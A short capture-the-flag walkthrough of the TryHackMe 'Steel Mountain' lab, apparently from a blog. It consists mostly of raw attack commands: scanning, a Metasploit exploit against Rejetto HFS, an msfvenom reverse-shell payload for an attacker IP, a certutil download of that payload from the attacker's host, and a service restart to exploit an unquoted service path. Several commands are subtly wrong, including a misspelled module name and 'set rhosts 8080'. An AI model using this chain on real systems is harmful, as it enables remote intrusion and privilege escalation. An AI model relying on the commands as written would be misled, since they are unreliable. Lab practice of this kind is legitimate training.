Steel Mountain Walkthrough


We will solve this room from TryHackMe, Steel Mountain.



Introduction

This was an easy Windows box that involved gaining initial access through a remote command execution vulnerability in the Rejetto HTTP File Server web application and exploiting a unquoted service path vulnerability in the Advanced System Care 9 application to gain SYSTEM level access


rustscan -a 10.10.240.220 — ulimit 5000
Rustscan result
nmap -sC -sV -p80,135,139,445,5985,8080,47001,49152,49153,49154,49155,49157,49163,49164 10.10.240.220 -oN nmap.log
search rejetto
use exploit/windows/http/rejetto_hfs_hxec
set rhosts 10.10.240.220
set lhost tun0
set rhosts 8080
upload /home/kali/vm_walkthrough/tryhackme/easy/steel_mountain/winpeas.exe
wmic service get name,displayname,pathname,startmode |findstr /i “auto” | findstr /i /v “C:\windows\\” |findstr /i /v “””
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.3.171 LPORT=5555 -f exe -o Advanced.exe
certutil -urlcache -f http://10.9.3.171:8080/Advanced.exe Advanced.exe
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9

Post a Comment

Previous Post Next Post